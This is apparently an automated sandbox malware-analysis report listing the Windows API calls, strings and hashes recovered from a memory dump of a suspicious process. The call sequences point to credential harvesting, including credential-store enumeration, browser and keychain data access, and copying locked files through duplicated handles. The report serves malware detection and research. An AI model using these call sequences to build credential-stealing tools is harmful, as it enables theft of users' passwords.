39843->39858 39844 43ac18 39847 43ac47 39844->39847 40020 42bbd5 memcpy memcpy memcpy memset memcpy 39844->40020 39848 43aca8 39847->39848 40021 438eed 16 API calls 39847->40021 39852 43acd5 39848->39852 40023 4233ae 11 API calls 39848->40023 39851 43ac87 40022 4233c5 16 API calls 39851->40022 40024 423426 11 API calls 39852->40024 39856 43ace1 40025 439811 163 API calls 39856->40025 39857 
43a9f6 161 API calls 39857->39858 39858->39834 39858->39844 39858->39857 40019 439bbb 22 API calls 39858->40019 39860 43acfd 39865 43ad2c 39860->39865 40026 438eed 16 API calls 39860->40026 39862 43ad19 40027 4233c5 16 API calls 39862->40027 39864 43ad58 40028 44081d 163 API calls 39864->40028 39865->39864 39868 43add9 39865->39868 40032 423426 11 API calls 39868->40032 39869 43ae3a memset 39870 43ae73 39869->39870 40033 42e1c0 147 API calls 39870->40033 39871 43adab 40030 438c4e 163 API calls 39871->40030 39872 43ad6c 39872->39834 39872->39871 40029 42370b memset memcpy memset 39872->40029 39876 43adcc 40031 440f84 12 API calls 39876->40031 39877 43ae96 40034 42e1c0 147 API calls 39877->40034 39880 43aea8 39881 43aec1 39880->39881 40035 42e199 147 API calls 39880->40035 39883 43af00 39881->39883 40036 42e1c0 147 API calls 39881->40036 39883->39834 39886 43af1a 39883->39886 39887 43b3d9 39883->39887 40037 438eed 16 API calls 39886->40037 39892 43b3f6 39887->39892 39893 43b4c8 39887->39893 39888 43b60f 39888->39834 40096 4393a5 17 API calls 39888->40096 39891 43af2f 40038 4233c5 16 API calls 39891->40038 40078 432878 12 API calls 39892->40078 39903 43b4f2 39893->39903 40084 42bbd5 memcpy memcpy memcpy memset memcpy 39893->40084 39895 43af51 40039 423426 11 API calls 39895->40039 39898 43af7d 40040 423426 11 API calls 39898->40040 39902 43af94 40041 423330 11 API calls 39902->40041 40085 43a76c 21 API calls 39903->40085 39904 43b529 40086 44081d 163 API calls 39904->40086 39905 43b462 40080 423330 11 API calls 39905->40080 39909 43b428 39909->39905 40079 432b60 16 API calls 39909->40079 39910 43afca 40042 423330 11 API calls 39910->40042 39911 43b47e 39915 43b497 39911->39915 40081 42374a memcpy memset memcpy memcpy memcpy 39911->40081 39912 43b544 39913 43b55c 39912->39913 40087 42c02e memset 39912->40087 40088 43a87a 163 API calls 39913->40088 40082 4233ae 11 API calls 39915->40082 39917 43afdb 40043 4233ae 11 API calls 39917->40043 39921 43b4b1 40083 423399 11 API 

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                • API String ID: 594330280-3398334509
                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%


                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$??3@CloseProcessProcess32memset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 3405910027-1740548384
                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                • String ID: BIN
                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2947809556-0
                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1690352074-0
                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3558857096-0
                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                • API String ID: 2745753283-3798722523
                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                • CopyFileW.KERNELBASE(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                • String ID: chp$v10
                                                                                                                • API String ID: 170802307-2783969131
                                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                • String ID: bhv
                                                                                                                • API String ID: 327780389-2689659898
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
